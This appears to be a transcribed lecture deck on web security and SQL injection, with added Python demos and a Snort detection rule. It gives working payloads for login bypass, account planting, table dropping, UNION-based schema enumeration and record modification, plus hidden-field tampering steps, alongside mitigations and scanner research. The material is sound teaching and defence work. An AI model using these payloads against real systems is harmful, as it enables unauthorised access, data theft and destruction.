Web site security Part 1 : SQL Injection


Page 1: Web site security Part 1 : SQL Injection


Reporter: James Chen


Outline

- Web site security
- SQL Injection overview
- Web application security scanner (WSS) overview
- SQL injection detection
- Security assessment tool


Web site security

- SQL injection
- Cross site scripting
- Directory traversal
- Authentication
- Parameter manipulation


SQL injection

SQL injection is an attack technique that passes SQL commands through a web application for execution by the backend database.

Attackers exploit the fact that the application builds its SQL statements by concatenating user-provided parameters into the query text, and embed SQL fragments inside those parameters so that they are parsed as part of the statement.

A web application that is open to SQL injection therefore lets an attacker execute arbitrary SQL queries and/or commands on the backend database server through the web application, with whatever privileges the application's database login holds.


Cross site scripting attack

Cross-site scripting is gaining popularity among attackers as a vulnerability that is easy to find in web sites and easy to exploit. The threats of cross-site scripting:

- Users can unknowingly execute malicious scripts when viewing dynamically generated pages built from content provided by an attacker.
- An attacker can take over the user's session before the session cookie expires.
- An attacker can connect users to a malicious server of the attacker's choice.
- An attacker can supply a user with a URL and convince that user to access it, which lets the attacker have a script or HTML of his choice executed in the user's browser. Using this technique, an attacker can take actions with the privileges of the user who accessed the URL, such as issuing queries on the underlying SQL databases and viewing the results, and exploiting known faulty implementations on the target system.


Directory traversal attacks

In a directory traversal attack, the attacker supplies a specially crafted filename (typically one containing ../ sequences) to a program, usually a server, so that it opens files in areas of the file system that should be unavailable.


Parameter manipulation

Parameter manipulation targets the business logic and can be used when the programmer has relied on hidden or fixed fields as the main security measure (for example, a hidden tag in a form or a parameter in a URL). Attackers can then modify these parameters to bypass the security check.


Authentication attacks

An authentication attack is a brute-force attack on a web application that requires authentication: a range of user names and passwords is tried in an attempt to authenticate.


SQL Injection overview

SQL injection attack patterns:

- break into the login screen
- plant an account
- drop a table
- steal information from tables
- modify table records


Breaking into the login screen

The SQL statement the application intends to execute:

    SELECT count(*) FROM Members WHERE UserName = 'John' AND Password = 'ABC'


Direct intrusion: the bad way to write the SQL statement (VB.NET string concatenation)

    "SELECT count(*) FROM Members WHERE UserName ='" & _
        txtUserName.Text & "' AND Password ='" & _
        txtPassword.Text & "'"

Entering the following in the [account] field is enough to log in successfully:

    ' OR 1=1--

The SQL statement the program executes becomes:

    SELECT count(*) FROM Members WHERE UserName = '' OR 1=1 -- And Password = ''

Everything after -- is a comment, so the password check is discarded and the query counts every row.


Planting an account and dropping a table

Entering the following in the [account] field adds an attacker's account:

    ';insert into Members(UserName, Password) Values ('hacker', 'foo')--

If the database login has sufficient privileges, entering the following in the [account] field drops the Members table:

    ';drop table Members --


Logging in without a password

Entering the following in the [password] field is enough to log in:

    aaa' Or UserName Like '%

The SQL statement the program executes becomes:

    SELECT count(*) FROM Members WHERE UserName = '' And Password = 'aaa' Or UserName Like '%'

AND binds more tightly than OR, so this is evaluated as (UserName = '' And Password = 'aaa') Or UserName Like '%', and the LIKE '%' clause matches every row.


Passing the parameters a page needs through the URL

    http://localhost/GoodSupplierProduct/Products.aspx?SupplierID=1


Bad program code (VB.NET):

    Dim strSQL As String = "SELECT * FROM Products WHERE Supplierid=" & _
        Request("SupplierID").ToString()

The parameter is numeric, so no quotes surround it in the statement: an attacker does not need a quote character to inject here, which is why quote filtering alone does not help.


Querying the SQL Server version

Enter in the address bar:

    http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999 union all select null, @@ServiceName, null, null, @@version, null, null, null, null, null

SupplierID=9999 matches no product, so only the UNIONed row is displayed; the number of values in the UNION SELECT must match the column count of SELECT * FROM Products.


Reading the database's tables

Enter in the address bar:

    http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999 union all select null, name, null, null, null, null, null, null, null, null from sysobjects where xtype='u'

The page now lists the table names (xtype='u' selects user tables).


Reading a table's columns

Enter in the address bar:

    http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999 union all select null, name, null, null, null, null, null, null, null, null from syscolumns where id=object_id('Products') and colid=1

The page now shows the column name (colid=1 is the first column; increment it to walk the remaining columns).


Modifying table records

Enter in the address bar:

    http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999;update Products set UnitPrice=1 Where ProductID=1

The semicolon ends the SELECT and the UPDATE runs as a second statement in the same batch.
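The URL payloads above (version disclosure, table enumeration and a stacked UPDATE against the unquoted SupplierID parameter), as an added runnable example that is not part of the original slides. Python's sqlite3 module stands in for SQL Server, so sqlite_version() plays the role of @@version and sqlite_master WHERE type='table' the role of sysobjects WHERE xtype='u'; the Products schema and rows are constructed. The block also shows the fix the slide's code lacks: the parameter is an integer, so convert it and bind it.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the slide's database. Products has ten
    columns, matching the ten values in each UNION payload; Members exists so that
    table enumeration has something to find. All rows are made up."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Products (
            ProductID INTEGER, ProductName TEXT, SupplierID INTEGER, CategoryID INTEGER,
            QuantityPerUnit TEXT, UnitPrice REAL, UnitsInStock INTEGER,
            UnitsOnOrder INTEGER, ReorderLevel INTEGER, Discontinued INTEGER);
        INSERT INTO Products VALUES (1, 'Chai', 1, 1, '10 boxes', 18.0, 39, 0, 10, 0);
        INSERT INTO Products VALUES (2, 'Chang', 1, 1, '24 bottles', 19.0, 17, 40, 25, 0);
        INSERT INTO Products VALUES (3, 'Syrup', 2, 2, '12 bottles', 10.0, 13, 70, 25, 0);
        CREATE TABLE Members (UserName TEXT, Password TEXT);
        INSERT INTO Members VALUES ('John', 'ABC');
    """)
    return con


def products_vulnerable(con, supplier_id):
    """Mirrors "SELECT * FROM Products WHERE Supplierid=" & Request("SupplierID").
    No quotes surround the value, so no quote character is needed to inject."""
    sql = "SELECT * FROM Products WHERE SupplierID=" + supplier_id
    return con.execute(sql).fetchall()


def products_vulnerable_batch(con, supplier_id):
    """Same concatenation, sent through a call that accepts a batch of statements, as
    the slide's ADO.NET + SQL Server setup does. sqlite3's execute() refuses batches,
    so executescript() stands in for that driver behaviour here."""
    con.executescript("SELECT * FROM Products WHERE SupplierID=" + supplier_id)


def products_safe(con, supplier_id):
    """Validate the type first (an ID is an integer), then bind it as a parameter."""
    sid = int(supplier_id)  # ValueError for anything that is not a plain integer
    return con.execute("SELECT * FROM Products WHERE SupplierID=?", (sid,)).fetchall()


# Ten values with one useful expression in the second (ProductName) position.
TEN_VALUES = "null, {}, null, null, null, null, null, null, null, null"


def demo():
    con = build_db()
    out = {"normal": sorted(r[1] for r in products_vulnerable(con, "1"))}

    # Version disclosure: sqlite_version() stands in for @@version.
    payload = "9999 union all select " + TEN_VALUES.format("sqlite_version()")
    out["version"] = products_vulnerable(con, payload)[0][1]

    # Table enumeration: sqlite_master stands in for sysobjects where xtype='u'.
    payload = ("9999 union all select " + TEN_VALUES.format("name") +
               " from sqlite_master where type='table'")
    out["tables"] = sorted(r[1] for r in products_vulnerable(con, payload))

    # Stacked statement: the UPDATE rides along behind the SELECT.
    products_vulnerable_batch(con, "9999;update Products set UnitPrice=1 where ProductID=1")
    out["price_after"] = con.execute(
        "SELECT UnitPrice FROM Products WHERE ProductID=1").fetchone()[0]

    # The typed, parameterised version rejects the payload before it reaches SQL.
    try:
        products_safe(con, "9999 union all select " + TEN_VALUES.format("sqlite_version()"))
        out["safe_rejected"] = False
    except ValueError:
        out["safe_rejected"] = True
    out["safe_normal"] = sorted(r[1] for r in products_safe(con, "1"))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Running it shows the vulnerable query returning the engine version and the table list in the ProductName column, the price of product 1 changed to 1 by the stacked UPDATE, and the safe version raising ValueError on the same payload while still serving the legitimate SupplierID=1 request.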


Basic principles for blocking SQL injection attacks (1)

- Pass user input to SQL statements or stored procedures as parameters. If the SQL statement or stored procedure uses EXEC to execute text built from user input, further precautions are needed.
- If user input cannot be passed as a parameter to the SQL statement or stored procedure:
  - use regular expressions to validate the format of user input;
  - limit the length of user input;
  - limit the privileges of the account the application uses to log in to the database;
  - remove "--" (the SQL comment marker) from user input;
  - replace single quotes in user input with double quotes (doubling the single quote, the standard SQL escape, has the same effect).

Quote replacement only protects string parameters: the numeric SupplierID parameter above is injected without any quote character, so it needs type validation or a bound parameter.


The effect of replacing the single quotes in user input

Suppose the SQL statement to be executed is:

    Select count(*) from Members where UserName='John' And Password='ABC'

and the user enters [' Or 1=1 -- ] in the UserName field.

- Without replacing the single quote, the statement returns the total number of rows in the Members table.
- With the single quote replaced, the statement returns 0.
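The login bypasses shown earlier (' OR 1=1-- in the account field, aaa' Or UserName Like '% in the password field) and the quote-replacement mitigation just described, as an added example that is not part of the original slides. Python's sqlite3 stands in for SQL Server and the Members rows are constructed. The mitigation is implemented by doubling the quote, the standard SQL escape, which gives the same 0 result as the slide describes while keeping a legitimate name such as O'Brien usable; the parameterised version is the first principle of the previous slide. The stacked statements (';insert ..., ';drop table ...) are not exercised here because sqlite3's execute() runs one statement per call; a driver that accepts batches, as in the slide's ASP.NET/SQL Server setup, would run them.

```python
import sqlite3


def build_members():
    """Constructed in-memory Members table with made-up rows; one name contains a
    legitimate apostrophe to show what naive concatenation does to real data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Members (UserName TEXT, Password TEXT)")
    con.executemany("INSERT INTO Members VALUES (?, ?)",
                    [("John", "ABC"), ("Mary", "secret"),
                     ("admin", "hunter2"), ("O'Brien", "pw")])
    return con


def login_concat(con, user, pwd):
    """The slide's vulnerable construction: user input spliced into the SQL text."""
    sql = ("SELECT count(*) FROM Members WHERE UserName = '" + user +
           "' AND Password = '" + pwd + "'")
    return con.execute(sql).fetchone()[0]


def login_quote_escaped(con, user, pwd):
    """The quote-replacement mitigation: neutralise single quotes in user input before
    concatenating. Doubling ('') is how SQL represents a quote inside a literal."""
    return login_concat(con, user.replace("'", "''"), pwd.replace("'", "''"))


def login_param(con, user, pwd):
    """Bound parameters: the input can never change the structure of the statement,
    whatever characters it contains."""
    sql = "SELECT count(*) FROM Members WHERE UserName = ? AND Password = ?"
    return con.execute(sql, (user, pwd)).fetchone()[0]


def demo():
    con = build_members()
    user_payload = "' OR 1=1--"                # typed into the account field
    pwd_payload = "aaa' Or UserName Like '%"   # typed into the password field
    out = {
        "concat_valid": login_concat(con, "John", "ABC"),
        "concat_user_payload": login_concat(con, user_payload, ""),
        "concat_pwd_payload": login_concat(con, "", pwd_payload),
        "escaped_user_payload": login_quote_escaped(con, user_payload, ""),
        "escaped_pwd_payload": login_quote_escaped(con, "", pwd_payload),
        "escaped_apostrophe_name": login_quote_escaped(con, "O'Brien", "pw"),
        "param_user_payload": login_param(con, user_payload, ""),
        "param_pwd_payload": login_param(con, "", pwd_payload),
        "param_valid": login_param(con, "John", "ABC"),
    }
    try:
        login_concat(con, "O'Brien", "pw")
        out["concat_apostrophe_name"] = "ok"
    except sqlite3.Error:
        out["concat_apostrophe_name"] = "error"  # the legitimate name breaks the statement
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Both payloads make the concatenated query count all four members (so any count > 0 logs the attacker in), the escaped and parameterised variants return 0 for them and 1 for John/ABC, and only the escaped and parameterised variants can authenticate O'Brien at all: the raw concatenation turns that name into a syntax error.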


Basic principles for blocking SQL injection attacks (2)

- Grant the application or web page only the permission to execute stored procedures, not direct access to the tables and views in the database.
- Log in to the database with Windows integrated security; do not log in as the system administrator.
- Set the MaxLength property of TextBox controls (a client-side limit only; the length check must be repeated on the server, since the form can be saved and edited as the next slides show).
- Strengthen auditing of database operations.


Hidden Field Tampering attack

Attack pattern:

- save the HTML form to disk;
- tamper with the values of the hidden fields;
- resubmit the tampered form to the web server.


BadMotor.com

The site uses hidden fields to pass data between pages.


View the [source] of the page containing the hidden field, save it as a new HTML file, and edit the saved content:

    <form name="Form1" method="post" action="http://<IP address>/BadMotor/Confirm.aspx?MotorID=1" id="Form1">
    <input name="HiddenPrice" id="HiddenPrice" type="hidden" value="1000000" />
    </form>

Open the saved HTML file in IE and submit it.

(Screenshot: the data in the hidden field has been tampered with; the original price is changed to the attacker's value.)


Web application security scanner (WSS) overview

WSSs operate under three constraints:

1. Neither documentation nor source code will be available for the target Web application.
2. Interactions with the target Web applications and observations of their behaviours will be done through their public interfaces.
3. The testing process must be automated, and testing a new target system should not require extensive human participation in test case generation.


SQL injection detection

- Typical validation procedure
- Anti-SQL-Injection.php
- Using the popular open-source IDS Snort
- Black-box approach


Typical validation procedure

    If Length(strUserName) < 3 OR Length(strUserName) > 20 Then
        OutputError("Invalid User Name")
    ElseIf Length(strPassword) < 6 OR Length(strPassword) > 11 Then
        OutputError("Invalid Password")
    Else
        Begin
            SQLQuery = "SELECT * FROM Users WHERE UserName='" + strUserName +
                       "' AND Password='" + strPassword + "';"
            If GetQueryResult(SQLQuery) = 0 Then
                bAuthenticated = false;
            Else
                bAuthenticated = true;
        End;

The length checks reject some payloads but leave the query itself vulnerable: any input within the length limits that contains a quote still changes the statement.


Anti-SQL-Injection.php

    <?php
    function anti_injection($sql)
    {
        // remove words that form SQL syntax (keyword blacklist, case-insensitive)
        $sql = preg_replace("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/i", "", $sql);
        $sql = trim($sql);        // strip surrounding whitespace
        $sql = strip_tags($sql);  // strip HTML and PHP tags
        $sql = addslashes($sql);  // escape quotes and backslashes with backslashes
        return $sql;
    }

    // usage: clean the data coming from the form
    $nome  = anti_injection($_POST["nome"]);
    $senha = anti_injection($_POST["senha"]);
    ?>

This is a blacklist filter: it mangles legitimate input that happens to contain one of the words (a surname such as Fromm loses letters), and a single pass can be defeated by nesting a keyword inside itself so that the removal recreates it. It is no substitute for parameterised queries.


Using the popular open-source IDS Snort

Detection of SQL Injection and Cross-site Scripting Attacks, by K.K. Mookhey and Nilesh Burghate, URL: http://www.securityfocus.com/infocus/1768/

The idea is to take the popular open-source IDS Snort and compose regular-expression-based rules for detecting SQL injection and cross-site scripting attacks. To avoid a high number of false positives, the signatures can be modified.

Regex for detection of SQL meta-characters:

    /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

It detects the hex equivalent of the single quote (%27), the single quote itself, the double dash, and the hash character (# and its hex equivalent %23).

The regular expression is added to a new Snort rule as follows:

    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established; uricontent:".pl"; pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)
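The paranoid signature run over a few constructed access-log lines, as an added example that is not part of the article or the slides. It emulates the two rule conditions that matter here (uricontent:".pl" and the pcre) and adds a tighter pattern of my own to illustrate the "modify the signatures" step: a quote only counts when OR or UNION follows it. The log lines are made up.

```python
import re

# The "paranoid" SQL meta-character pattern from the Snort rule above.
PARANOID = re.compile(r"(\%27)|(\')|(\-\-)|(\%23)|(#)", re.I)

# A tighter variant (my own, not from the article): a plain or encoded quote,
# optional separators, then OR or UNION as a whole word.
TIGHTER = re.compile(r"(%27|')(%20|\+|\s)*(or|union)\b", re.I)

# Constructed access-log lines (not real traffic): method, URI, protocol, status.
SAMPLE_LOG = """\
GET /cgi-bin/search.pl?q=chai HTTP/1.1 200
GET /cgi-bin/login.pl?user=%27%20OR%201%3D1-- HTTP/1.1 200
GET /cgi-bin/login.pl?user='+OR+1=1--&pass=x HTTP/1.1 200
GET /cgi-bin/names.pl?last=O%27Brien HTTP/1.1 200
GET /cgi-bin/search.pl?q=9999+union+all+select+null,name+from+sysobjects HTTP/1.1 200
GET /search.php?q=%27+or+1%3D1 HTTP/1.1 200
GET /images/logo.png HTTP/1.1 200
"""


def rule_matches(uri, pattern):
    """Emulates the rule's conditions on one request: uricontent:".pl" plus the pcre."""
    return ".pl" in uri and pattern.search(uri) is not None


def scan(log, pattern):
    """Return the request URIs in an access log that the rule would alert on."""
    hits = []
    for line in log.splitlines():
        _method, uri, _rest = line.split(" ", 2)
        if rule_matches(uri, pattern):
            hits.append(uri)
    return hits


if __name__ == "__main__":
    print("paranoid:", scan(SAMPLE_LOG, PARANOID))
    print("tighter: ", scan(SAMPLE_LOG, TIGHTER))
```

The paranoid pattern alerts on the two login attacks but also on O%27Brien, a legitimate apostrophe; the tighter pattern drops that false positive. Neither signature sees the UNION request against the numeric parameter, which contains no quote, dash or hash at all, and the .php request falls outside the rule's uricontent scope: the slide's earlier point that numeric injection needs no meta-characters applies to detection as much as to prevention.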


Black-box approach

Huang, Y. W., Huang, S. K., Lin, T. P., Tsai, C. H. "Web Application Security Assessment by Fault Injection and Behavior Monitoring." In Proc. 12th Int'l World Wide Web Conference, pp. 148-159, Budapest, Hungary, 2003.

- The authors developed WAVES, a testing platform for remote, black-box testing of Web application security.
- A black-box approach is adopted in order to analyze Web applications externally, without the aid of source code.
- A crawler discovers all pages in a Web site that contain HTML forms, since forms are the primary data entry points in most Web applications.


Black-box approach (cont.)

During the reverse engineering process, HTML pages are parsed with a Document Object Model (DOM) parser, and HTML forms are parsed and stored in XML format.

An attempt is then made to inject malicious SQL patterns into the server-side program that processes the form's input. The existing literature on SQL injection techniques was used to create a set of SQL injection patterns.

If the server-side program detects and filters malicious patterns, or if a filtering mechanism is provided on a global scale, the injection will fail.


SQL injection detection

- Complete crawling
- Bypass the validation procedure
- Test set generation and output analysis
- Injection patterns and error messages


Complete crawling

- A "complete crawling" mechanism attempts a more complete crawl, that is, all data entry points must be correctly identified.
- It looks at the ways HTML pages reveal the existence of other pages or entry points.
- A "deep injection" mechanism is used to eliminate the resulting false negatives.


HTML pages reveal the existence of other pages or entry points (figure)


Bypass the validation procedure

- The Topic Model
- The Injection Knowledge Manager (IKM)


Injection Knowledge Manager (IKM)

The IKM must decide not only which variable to place the injection pattern in, but also how to fill the other variables with potentially valid data, so that the request passes the validation procedure and the injected value reaches the database.


Bypass the validation procedure

Using the Injection Knowledge Manager (IKM). Because only query interfaces (and not browsing interfaces) are provided, these types of document repositories cannot be indexed by current crawling technologies; filling the forms with plausible values is what lets the crawler reach the content behind them.


Test set generation and output analysis

Using the knowledge base (KB), the IKM implements four algorithms: Get_Topic(), Get_Value(), Expand_Values() and Feedback().

- Get_Topic(t): checks whether a topic can be associated with t, where t is the term (variable name or descriptive keyword) associated with the text box.
- Get_Value(): retrieves the best possible guess for the value of that text box.
- Expand_Values(): expands the knowledge base.
- Feedback(): if the injection succeeds, saves the input values that were used.


Expand_Values() example

The topic Company has STerm_Company = {"Company", "Firm"} and SValue_Company = {"IBM", "HP", "Sun", "Lucent", "Cisco"}. An input variable "Affiliation" is associated with SValue_Input = {"HP", "Lucent", "Cisco", "Dell"}.

The crawler calls Expand_Values() with "Affiliation" and SValue_Input. After failing to find a nearest term for "Affiliation", the Knowledge Manager notes that SValue_Company is very close to SValue_Input, and inserts the term "Affiliation" into STerm_Company and the value SValue_Input - SValue_Company = {"Dell"} into SValue_Company.

Both STerm_Company and SValue_Company are expanded.
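The Expand_Values() walk-through above, carried through in running code as an added example; this is not WAVES code. The knowledge-base layout (topic to term set and value set), the case-insensitive term match, the overlap coefficient as the closeness measure and the 0.5 threshold are assumptions standing in for details the slide does not give; the Company data is the slide's own.

```python
def build_kb():
    """Knowledge base: topic -> (STerm set, SValue set), seeded with the slide's
    Company topic. The dict-of-sets layout is an assumption of this example."""
    return {"Company": ({"Company", "Firm"}, {"IBM", "HP", "Sun", "Lucent", "Cisco"})}


def get_topic(kb, term):
    """Get_Topic(t): the topic whose term set contains t, else None (case-insensitive, assumed)."""
    for topic, (terms, _values) in kb.items():
        if term.lower() in {t.lower() for t in terms}:
            return topic
    return None


def get_value(kb, term):
    """Get_Value(): best guess for a text box labelled `term`. The slide gives no
    ranking, so this returns the alphabetically first value of the term's topic (assumption)."""
    topic = get_topic(kb, term)
    return None if topic is None else sorted(kb[topic][1])[0]


def overlap(a, b):
    """Overlap coefficient |a & b| / min(|a|, |b|). The slide only says "very close";
    this measure and the 0.5 threshold used below are assumptions."""
    return len(a & b) / min(len(a), len(b)) if a and b else 0.0


def expand_values(kb, term, values, threshold=0.5):
    """Expand_Values(): for an unknown term, find the topic whose value set overlaps most
    with `values`; if close enough, add the term to STerm and the new values to SValue.
    Returns the topic that was expanded, or None when nothing was learned."""
    if get_topic(kb, term) is not None:
        return None                      # term already known; nothing to learn
    values = set(values)
    best_topic, best_score = None, 0.0
    for topic, (_terms, known) in kb.items():
        score = overlap(values, known)
        if score > best_score:
            best_topic, best_score = topic, score
    if best_topic is None or best_score < threshold:
        return None
    terms, known = kb[best_topic]
    terms.add(term)
    known |= values - known              # SValue_Input - SValue_Company, here {"Dell"}
    return best_topic


def feedback(kb, term, value):
    """Feedback(): an injection that got past validation means `value` was accepted for
    `term`; remember it under the term's topic so later guesses reuse it."""
    topic = get_topic(kb, term)
    if topic is not None:
        kb[topic][1].add(value)
    return topic


def demo():
    kb = build_kb()
    expanded = expand_values(kb, "Affiliation", {"HP", "Lucent", "Cisco", "Dell"})
    return expanded, sorted(kb["Company"][0]), sorted(kb["Company"][1])


if __name__ == "__main__":
    print(demo())
```

With the slide's data the overlap is 3/4, so "Affiliation" joins STerm_Company and "Dell" joins SValue_Company; a term whose values share nothing with any topic (say a colour list) leaves the knowledge base untouched.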


Injection patterns and error messages

WAVES injection patterns are crafted not to intrude on a vulnerable entry point (e.g., by executing a SQL command) but to make it output database error messages.

If an entry point outputs database error messages in response to a particular injection pattern, it is vulnerable to that pattern.

We search for a particular string in an HTML output to detect database error messages.


WAVES injection patterns (figure)


Database error messages (figure)


Output analysis

Negative Response Extraction (NRE) algorithm:

1. If an initial injection fails, the returned page is saved as R1.
2. The crawler then sends an intentionally invalid request to the targeted Web application, for instance a random 50-character string for the UserName variable. The returned page is retrieved and saved as R2.
3. Finally, the crawler sends to the Web application a request generated by the IKM with a high likelihood of validity, but without injection strings. The returned page is saved as R3.
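Error-message detection (described under "Injection patterns and error messages" above) together with the three NRE requests, as an added example that is not WAVES code. The targets are constructed sqlite3-backed login handlers that mimic four server behaviours, including the length-only validation procedure shown earlier in this deck; the error-string list is a constructed set of well-known engine messages; and the way R1, R2 and R3 are compared after the three requests is a simplified interpretation added here, since the slide lists only the requests themselves.

```python
import random
import sqlite3
import string

# Error-provoking patterns: each leaves an odd number of quotes, so a concatenating
# back end builds a malformed statement instead of running anything extra.
INJECTION_PATTERNS = ["'", "admin'", "' OR 'a'='a'"]

# Substrings searched for in the returned HTML. A constructed list of well-known
# engine messages; the slide's own table is not reproduced on this page.
DB_ERROR_SIGNATURES = [
    "You have an error in your SQL syntax",                # MySQL
    "Unclosed quotation mark after the character string",  # Microsoft SQL Server
    "ORA-01756",                                           # Oracle
    "unterminated quoted string",                          # PostgreSQL
    "syntax error", "unrecognized token",                  # SQLite (the targets below)
]


def has_db_error(html):
    return any(sig in html for sig in DB_ERROR_SIGNATURES)


def make_target(mode):
    """Constructed login handler standing in for a remote form. `mode` selects the
    server-side behaviour: "open" (no checks), "length" (the length checks of the
    typical validation procedure only), "quotes" (length checks plus rejection of any
    single quote), "hide" (no checks, but a generic error page instead of the
    database message)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    con.execute("INSERT INTO Users VALUES ('John', 'ABC')")

    def handler(user, pwd):
        if mode in ("length", "quotes") and not (3 <= len(user) <= 20 and 6 <= len(pwd) <= 11):
            return "<html>Invalid User Name</html>"
        if mode == "quotes" and "'" in user + pwd:
            return "<html>Invalid User Name</html>"
        sql = "SELECT * FROM Users WHERE UserName='" + user + "' AND Password='" + pwd + "'"
        try:
            row = con.execute(sql).fetchone()
        except sqlite3.Error as exc:
            if mode == "hide":
                return "<html>Internal Server Error</html>"
            return "<html>%s</html>" % exc
        return "<html>Welcome</html>" if row else "<html>Login failed</html>"

    return handler


def probe(handler, pattern):
    """One NRE round for one pattern. The three requests follow the slide; how R1, R2
    and R3 are compared is a simplified interpretation added here."""
    r1 = handler(pattern, "x" * 8)                      # the injection attempt
    if has_db_error(r1):
        return "vulnerable"                             # the database error leaked
    junk = "".join(random.choices(string.ascii_letters, k=50))
    r2 = handler(junk, "x" * 8)                         # intentionally invalid request
    if r1 == r2:
        return "filtered"          # injection treated as bad input: validation in the way
    r3 = handler("guest", "x" * 8)                      # plausible request, no injection
    return "no-effect" if r1 == r3 else "unknown"


def assess(mode):
    handler = make_target(mode)
    return {p: probe(handler, p) for p in INJECTION_PATTERNS}


if __name__ == "__main__":
    for mode in ("open", "length", "quotes", "hide"):
        print(mode, assess(mode))
```

The "open" target is flagged on every pattern. The "length" target filters the lone quote (R1 equals the invalid-request page R2, which is where the IKM would step in to pad the input to a valid length) but is still flagged by the two patterns that satisfy the length rule, the gap noted under the typical validation procedure. The "quotes" target filters everything, and the "hide" target, which swallows the database message, yields "unknown": no error string and a response unlike either R2 or R3, the case that needs a blind technique such as Absinthe's true/false profiling discussed later.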



WAVES' system operation

- The crawlers act as interfaces between Web applications and the software testing mechanisms.
- The crawlers are equipped with IE's Document Object Model (DOM) parser and scripting engine so that they exhibit the same behaviours as browsers.
- Events are triggered by the test cases or by Web application errors.
- This is accomplished by three strategies: browser emulation, user event generation, and automated form completion.

System architecture of WAVES (figure).


Other security assessment tools

WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.


Security assessment tools (cont.)

Absinthe

Absinthe is a GUI-based tool designed to automate the process of blind SQL injection. It works by profiling response pages as true or false from known cases, then moves on to classify unknown responses as true or false.


Absinthe


Absinthe (cont.)


Summary

I have introduced some SQL injection detection methods.

In order to detect SQL injection attacks, I think the black-box method is a better method.

An automatic black-box method should include some features: complete crawling, bypassing the validation procedure, and automatic output analysis according to output error messages.


False positives vs. false negatives

False positives occur when an organisation is alerted to supposedly malicious activity and, on inspection, nothing has actually happened.

False negatives are failures to detect a real malicious attacker or unauthorised activity.


References

- Yao-Wen Huang, Chung-Hung Tsai, Tsung-Po Lin, Shih-Kun Huang, D.T. Lee, Sy-Yen Kuo, "A testing framework for Web application security assessment", Computer Networks 48 (2005) 739-761.
- Y.W. Huang, S.K. Huang, T.P. Lin, C.H. Tsai, "Securing Web application code by static analysis and runtime protection", in: Proceedings of the 13th International World Wide Web Conference, New York, May 17-22, 2004.
- Y.W. Huang, F. Yu, C. Hang, C.H. Tsai, D.T. Lee, S.Y. Kuo, "Verifying Web applications using bounded model checking", in: Proceedings of the 2004 International Conference on Dependable Systems and Networks (DSN 2004), Florence, Italy, June 28-July 1, 2004.
- S. Raghavan, H. Garcia-Molina, "Crawling the Hidden Web", in: Proceedings of the 27th VLDB Conference, Roma, Italy, Sep 2001, pp. 129-138. (LITE algorithm)